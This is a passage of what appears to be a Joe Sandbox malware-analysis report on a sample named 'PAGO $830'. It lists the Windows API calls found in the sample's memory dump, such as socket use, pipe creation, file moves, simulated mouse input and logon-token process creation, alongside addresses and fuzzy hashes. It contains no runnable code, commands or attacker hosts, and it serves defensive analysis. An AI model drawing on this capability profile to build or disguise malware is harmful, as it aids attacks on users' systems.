                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D8A05E,00000000,00000000,00000000,000000FF,00000000), ref: 00DC7380
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractMessageSend$ImageLoad
                                                          • String ID:
                                                          • API String ID: 1777660482-0
                                                          • Opcode ID: b2d9bdd9c5da724c788d7f768d0b65635755ab082240bfa36eee31aa28940b03
                                                          • Instruction ID: 2a851ecb4891694c6d0672362f00d0632f54369f6b5077b291f2986c81264173
                                                          • Opcode Fuzzy Hash: b2d9bdd9c5da724c788d7f768d0b65635755ab082240bfa36eee31aa28940b03
                                                          • Instruction Fuzzy Hash: D641FC7160024AEFEB21CF29CC45BAA7BA4EF49320F24424EF891971D1D331E941DF25
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 00D92CDB
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00D92CE3
                                                          • _ValidateLocalCookies.LIBCMT ref: 00D92D71
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00D92D9C
                                                          • _ValidateLocalCookies.LIBCMT ref: 00D92DF1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 20b046800e5da0d1ef40ff49911b77083f86185fd07f32f664fb7942153e24c7
                                                          • Instruction ID: 10911c7d11ba08e46127cfffd35a80a3932bafd0c1ed49dbb88d43c2f4ebf932
                                                          • Opcode Fuzzy Hash: 20b046800e5da0d1ef40ff49911b77083f86185fd07f32f664fb7942153e24c7
                                                          • Instruction Fuzzy Hash: 65419134A00209ABCF14EF68C845AAEBBA5EF45324F188155E8196B392D771EA45CBF0
                                                          APIs
                                                            • Part of subcall function 00DF2F75: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DF2FA1
                                                            • Part of subcall function 00DF2F75: _wcslen.LIBCMT ref: 00DF2FC2
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00DF1039
                                                          • WSAGetLastError.WSOCK32 ref: 00DF1048
                                                          • WSAGetLastError.WSOCK32 ref: 00DF10F0
                                                          • closesocket.WSOCK32(00000000), ref: 00DF1120
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 2675159561-0
                                                          • Opcode ID: d508aef38b62be3974be069b2008eceb76c5680a028b77f6f1e4f586730ce42f
                                                          • Instruction ID: 69ccfc5319cb92f4493e405d4dd95f2960a84220b955bc542e447a2a7f5e641d
                                                          • Opcode Fuzzy Hash: d508aef38b62be3974be069b2008eceb76c5680a028b77f6f1e4f586730ce42f
                                                          • Instruction Fuzzy Hash: 3F411235600208AFDB109F25C844BB9B7A9FF44324F19C159FA05AB282CB71ED84CBF1
                                                          APIs
                                                            • Part of subcall function 00DDDCFE: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DDCE40,?), ref: 00DDDD1B
                                                            • Part of subcall function 00DDDCFE: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DDCE40,?), ref: 00DDDD34
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00DDCE63
                                                          • MoveFileW.KERNEL32(?,?), ref: 00DDCE9D
                                                          • _wcslen.LIBCMT ref: 00DDCF23
                                                          • _wcslen.LIBCMT ref: 00DDCF39
                                                          • SHFileOperationW.SHELL32(?), ref: 00DDCF7F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 3164238972-1173974218
                                                          • Opcode ID: 3b84ad741c948b99f94eb06401c0e0462923219291358da7e2700b7dd9a7a87f
                                                          • Instruction ID: e5ba3d45d212e531ad7b234e7c47e6b88ec6012639bf28937eb2602e469d76a6
                                                          • Opcode Fuzzy Hash: 3b84ad741c948b99f94eb06401c0e0462923219291358da7e2700b7dd9a7a87f
                                                          • Instruction Fuzzy Hash: 964155729452195EDF12EBA4D981EDD77B9EF08340F1410E7E505EB241EB74A688CB70
                                                          APIs
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E02D4F
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02D82
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02DB7
                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E02DE9
                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E02E13
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02E24
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E02E3E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: d2a8d60ec4796f58fa05174fee0facf3e9427eb586713970515ea190acf5e1fb
                                                          • Instruction ID: 29666217f39876d92e22b5112cecaa05fd0f1382b21e226e29709d119540dbbb
                                                          • Opcode Fuzzy Hash: d2a8d60ec4796f58fa05174fee0facf3e9427eb586713970515ea190acf5e1fb
                                                          • Instruction Fuzzy Hash: 4A312834644145AFDB21CF09EC88F6437E5FB8A714F2411A8F604AF2F1CB72AC859B02
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD76BF
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD76E5
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00DD76E8
                                                          • SysAllocString.OLEAUT32(?), ref: 00DD7706
                                                          • SysFreeString.OLEAUT32(?), ref: 00DD770F
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00DD7734
                                                          • SysAllocString.OLEAUT32(?), ref: 00DD7742
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: d4a09621f39c930dfa0b0a26351640336018c312603ed4b7883702d8ce70a711
                                                          • Instruction ID: 8f00c79f7ecab1d9331802f7c7228324499a5fdb980841eb5de8114bd2bbb7ed
                                                          • Opcode Fuzzy Hash: d4a09621f39c930dfa0b0a26351640336018c312603ed4b7883702d8ce70a711
                                                          • Instruction Fuzzy Hash: 4C21B07660421ABFDB10AFA9CC88CBA73ACEB083647148566FA14DB290E670DC858770
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD7798
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD77BE
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00DD77C1
                                                          • SysAllocString.OLEAUT32 ref: 00DD77E2
                                                          • SysFreeString.OLEAUT32 ref: 00DD77EB
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00DD7805
                                                          • SysAllocString.OLEAUT32(?), ref: 00DD7813
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 6df03f631beda56044da8f3097260f83ca183070d1d6792ee1912b6857e44659
                                                          • Instruction ID: c1a4e7e30f0e7d73be611c2321fc75ab8170af77f19d1ffec8d1a34b684b1030
                                                          • Opcode Fuzzy Hash: 6df03f631beda56044da8f3097260f83ca183070d1d6792ee1912b6857e44659
                                                          • Instruction Fuzzy Hash: 7B21F535608205BFDB10AFA9CC88DBA77ECFB083607148566F904DB2A0E670DC85CB74
                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00DE0410
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DE044C
                                                          Strings
                                                          Similarity
                                                          • API ID: CreateHandlePipe
                                                          • String ID: nul
                                                          • API String ID: 1424370930-2873401336
                                                          • Opcode ID: b83c625f614190deabc66245ba1f30d7509a98ff1c20fa768a5098e6e7fd66c6
                                                          • Instruction ID: 3755f0d3804a305e1b63ff0528a70ed449ac058066d17b3eb50a12becb3365f9
                                                          • Opcode Fuzzy Hash: b83c625f614190deabc66245ba1f30d7509a98ff1c20fa768a5098e6e7fd66c6
                                                          • Instruction Fuzzy Hash: BF216071500346AFDB20AF66DD04A997BE4FF54724F244A19FAA1E72E0D7B19880CB70
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00DE04E4
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DE051F
                                                          Strings
                                                          Similarity
                                                          • API ID: CreateHandlePipe
                                                          • String ID: nul
                                                          • API String ID: 1424370930-2873401336
                                                          • Opcode ID: 5c450d0ca86df8db19538794c4dc673b9c3b7dc8074325e75ef85cd14e494cdc
                                                          • Instruction ID: e68535e50af7c3618b46e0165350aa3291e5c209ce525478f15ede9bf3a541c9
                                                          • Opcode Fuzzy Hash: 5c450d0ca86df8db19538794c4dc673b9c3b7dc8074325e75ef85cd14e494cdc
                                                          • Instruction Fuzzy Hash: CF216D755003469FDB20AF6AD804A9A7BE8AF55724F240B19EDE1E62D0D7B199C0CB30
                                                          APIs
                                                            • Part of subcall function 00DAD743: _free.LIBCMT ref: 00DAD76C
                                                          • _free.LIBCMT ref: 00DAD7CD
                                                            • Part of subcall function 00DA2958: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000), ref: 00DA296E
                                                            • Part of subcall function 00DA2958: GetLastError.KERNEL32(00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000,00000000), ref: 00DA2980
                                                          • _free.LIBCMT ref: 00DAD7D8
                                                          • _free.LIBCMT ref: 00DAD7E3
                                                          • _free.LIBCMT ref: 00DAD837
                                                          • _free.LIBCMT ref: 00DAD842
                                                          • _free.LIBCMT ref: 00DAD84D
                                                          • _free.LIBCMT ref: 00DAD858
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                          • Instruction ID: f11bf931fdc2f8ca25d564115bbd8467f9d1752d123bc30180a3c846aa182a7d
                                                          • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                          • Instruction Fuzzy Hash: 531184B16D0744A6D921BB71CC0BFDB77DDEF42700F400815B29FA6852DA24B6494B71
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DDD992
                                                          • LoadStringW.USER32(00000000), ref: 00DDD999
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DDD9AF
                                                          • LoadStringW.USER32(00000000), ref: 00DDD9B6
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DDD9FA
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00DDD9D7
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 4072794657-3128320259
                                                          • Opcode ID: 5d0ce85901d5625f03b207ed8d1de4fa2d75dabd1dd7d6ccf50f2fe532c09c68
                                                          • Instruction ID: 33ff459809bac00da4c0a178c6dab87278cabeefbda038be98eeb724a64f8902
                                                          • Opcode Fuzzy Hash: 5d0ce85901d5625f03b207ed8d1de4fa2d75dabd1dd7d6ccf50f2fe532c09c68
                                                          • Instruction Fuzzy Hash: A80162F69002087FEB109BA49D89EE6766CE708700F100592B75AF2081E6759EC88F74
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00DE0899
                                                          • EnterCriticalSection.KERNEL32(00000000,?), ref: 00DE08AB
                                                          • TerminateThread.KERNEL32(00000000,000001F6), ref: 00DE08B9
                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00DE08C7
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DE08D6
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DE08E6
                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 00DE08ED
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: a6abf4aed952541a04d22af41ffa84b57f38fd7183bc14a49e6e187f56f6dbcc
                                                          • Instruction ID: a0989729ff770d32a99bdee5b563248b97182b2afdc3f6304351d3f197dc40eb
                                                          • Opcode Fuzzy Hash: a6abf4aed952541a04d22af41ffa84b57f38fd7183bc14a49e6e187f56f6dbcc
                                                          • Instruction Fuzzy Hash: 73F0E131042A13BFD7512B95ED8DBDA7B35FF04702F546221F201608B09B7594E5CFA0
                                                          APIs
                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00DF1CE7
                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00DF1D08
                                                          • WSAGetLastError.WSOCK32 ref: 00DF1D19
                                                          • htons.WSOCK32(?,?,?,?,?), ref: 00DF1E02
                                                          • inet_ntoa.WSOCK32(?), ref: 00DF1DB3
                                                            • Part of subcall function 00DD3930: _strlen.LIBCMT ref: 00DD393A
                                                            • Part of subcall function 00DF314B: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00DEEB33), ref: 00DF3167
                                                          • _strlen.LIBCMT ref: 00DF1E5C
                                                          Similarity
                                                          • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                          • String ID:
                                                          • API String ID: 3203458085-0
                                                          • Opcode ID: 8ada5fa28ebf9c12b08a2cfbb08fc0d705138e12e36e3816de4b5d2b9ce86291
                                                          • Instruction ID: c62ccdbca2198a65c2ee6139079d714d31d2bbe49e44240315f8d7c26b6626b2
                                                          • Opcode Fuzzy Hash: 8ada5fa28ebf9c12b08a2cfbb08fc0d705138e12e36e3816de4b5d2b9ce86291
                                                          • Instruction Fuzzy Hash: 31B1DE35204344AFC324EF24C895E2A7BA5EF84318F59C94CF55A5B2A2DB31ED46CBB1
                                                          APIs
                                                          • __allrem.LIBCMT ref: 00DA004A
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA0066
                                                          • __allrem.LIBCMT ref: 00DA007D
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA009B
                                                          • __allrem.LIBCMT ref: 00DA00B2
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA00D0
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: 7a9d308b5ab41ef35beb355f12ca968d0eebff7fabe2103bb5688a3c2d80e2a0
                                                          • Instruction ID: a4fe98d98b6778fb12736f4e218061c34e60a30868f2937e8d1916a59b603db1
                                                          • Opcode Fuzzy Hash: 7a9d308b5ab41ef35beb355f12ca968d0eebff7fabe2103bb5688a3c2d80e2a0
                                                          • Instruction Fuzzy Hash: 91811972A007069BEB209F79CC41BAA77E9EF46364F28413EF551D7281EBB0D9058774
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D98269,00D98269,?,?,?,00DA63DF,00000001,00000001,8BE85006), ref: 00DA61E8
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00DA63DF,00000001,00000001,8BE85006,?,?,?), ref: 00DA626E
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00DA6368
                                                          • __freea.LIBCMT ref: 00DA6375
                                                            • Part of subcall function 00DA37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D8FD75,?,?,00D7B63D,00000000,?,?,?,00DE106C,00E0D0D0,?,00DB242E), ref: 00DA37E2
                                                          • __freea.LIBCMT ref: 00DA637E
                                                          • __freea.LIBCMT ref: 00DA63A3
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1414292761-0
                                                          • Opcode ID: 147b65b7ed150d149bf7f8862d4e8b1378f34dd75d40d89744c67a0596fb9332
                                                          • Instruction ID: b6ca2e114f8fb79110b307ed3d084efc0d754123e27cc09c3da4d27bef26ebe0
                                                          • Opcode Fuzzy Hash: 147b65b7ed150d149bf7f8862d4e8b1378f34dd75d40d89744c67a0596fb9332
                                                          • Instruction Fuzzy Hash: DA519D72600216EFEF258F64CC41EBF76BAEB46750B1D4628F905DA191EB34EC45C6B0
                                                          APIs
                                                          • VariantInit.OLEAUT32(00000035), ref: 00DCF6A2
                                                          • SysAllocString.OLEAUT32(?), ref: 00DCF749
                                                          • VariantCopy.OLEAUT32(00DCF94D,00000000), ref: 00DCF772
                                                          • VariantClear.OLEAUT32(00DCF94D), ref: 00DCF796
                                                          • VariantCopy.OLEAUT32(00DCF94D,00000000), ref: 00DCF79A
                                                          • VariantClear.OLEAUT32(?), ref: 00DCF7A4
                                                          Similarity
                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                          • String ID:
                                                          • API String ID: 3859894641-0
                                                          APIs
                                                            • Part of subcall function 00D78FA0: _wcslen.LIBCMT ref: 00D78FA5
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00DE9403
                                                          • _wcslen.LIBCMT ref: 00DE9424
                                                          • _wcslen.LIBCMT ref: 00DE944B
                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00DE94A3
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcslen$FileName$OpenSave
                                                          • String ID: X
                                                          • API String ID: 83654149-3081909835
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • BeginPaint.USER32(?,?,?), ref: 00D8A6C7
                                                          • GetWindowRect.USER32(?,?), ref: 00D8A72B
                                                          • ScreenToClient.USER32(?,?), ref: 00D8A748
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D8A759
                                                          • EndPaint.USER32(?,?,?,?,?), ref: 00D8A7A7
                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00DC7BA7
                                                            • Part of subcall function 00D8A7BF: BeginPath.GDI32(00000000), ref: 00D8A7DD
                                                          Similarity
                                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                          • String ID:
                                                          • API String ID: 3050599898-0
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DE072A
                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00DE0765
                                                          • EnterCriticalSection.KERNEL32(?), ref: 00DE0781
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00DE07FA
                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00DE0811
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DE083F
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                          • String ID:
                                                          • API String ID: 3368777196-0
                                                          APIs
                                                          • ShowWindow.USER32(?,00000000,?,?,?,?,00DC767D), ref: 00E0813E
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00E08164
                                                          • ShowWindow.USER32(?,00000000,?,?,?,?,00DC767D), ref: 00E081C3
                                                          • ShowWindow.USER32(00000000,00000004,?,?,?,?,00DC767D), ref: 00E081D7
                                                          • EnableWindow.USER32(00000000,00000001), ref: 00E081FD
                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E08221
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 00DF220F
                                                            • Part of subcall function 00DEE40C: GetWindowRect.USER32(?,?), ref: 00DEE424
                                                          • GetDesktopWindow.USER32 ref: 00DF2239
                                                          • GetWindowRect.USER32(00000000), ref: 00DF2240
                                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DF227C
                                                          • GetCursorPos.USER32(?), ref: 00DF22A8
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DF2306
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                          • String ID:
                                                          • API String ID: 2387181109-0
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00DD4BEB
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DD4C08
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DD4C40
                                                          • _wcslen.LIBCMT ref: 00DD4C5E
                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00DD4C66
                                                          • _wcsstr.LIBVCRUNTIME ref: 00DD4C70
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                          • String ID:
                                                          • API String ID: 72514467-0
                                                          APIs
                                                            • Part of subcall function 00D7592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D75922,?,?,00D748AA,?,?,?,00000000), ref: 00D7594D
                                                          • _wcslen.LIBCMT ref: 00DE5799
                                                          • CoInitialize.OLE32(00000000), ref: 00DE58B3
                                                          • CoCreateInstance.OLE32(00E0FD14,00000000,00000001,00E0FB84,?), ref: 00DE58CC
                                                          • CoUninitialize.OLE32 ref: 00DE58EA
                                                          Strings
                                                          Similarity
                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                          • String ID: .lnk
                                                          • API String ID: 3172280962-24824748
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E07BD5
                                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00E07BFA
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E07C12
                                                          • GetSystemMetrics.USER32(00000004), ref: 00E07C3B
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00DEB6CB,00000000), ref: 00E07C5B
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • GetSystemMetrics.USER32(00000004), ref: 00E07C46
                                                          Similarity
                                                          • API ID: Window$Long$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 2294984445-0
                                                          APIs
                                                            • Part of subcall function 00DD0EF8: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DD0F0E
                                                            • Part of subcall function 00DD0EF8: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DD0F1A
                                                            • Part of subcall function 00DD0EF8: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DD0F29
                                                            • Part of subcall function 00DD0EF8: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DD0F30
                                                            • Part of subcall function 00DD0EF8: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DD0F46
                                                          • GetLengthSid.ADVAPI32(?,00000000,00DD1279), ref: 00DD16F2
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00DD16FE
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00DD1705
                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00DD171E
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00DD1279), ref: 00DD1732
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD1739
                                                          Similarity
                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                          • String ID:
                                                          • API String ID: 3008561057-0
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00DD1443
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00DD144A
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00DD1459
                                                          • CloseHandle.KERNEL32(00000004), ref: 00DD1464
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DD1493
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00DD14A7
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
